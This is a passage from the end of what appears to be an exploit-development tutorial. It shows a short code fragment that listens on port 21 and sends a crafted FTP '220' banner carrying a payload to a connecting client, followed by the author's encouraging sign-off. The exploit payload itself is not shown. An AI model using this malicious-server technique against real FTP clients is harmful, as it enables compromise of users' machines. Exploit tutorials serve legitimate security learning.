l = listen(21)
_ = l.wait_for_connection()
l.sendline(b"220 " + payload)
```
Wait for the connection in another terminal.
Exploit development is a long journey. It's endless; we just need to keep running. 😀 😀
If you face any trouble during testing, just ping me.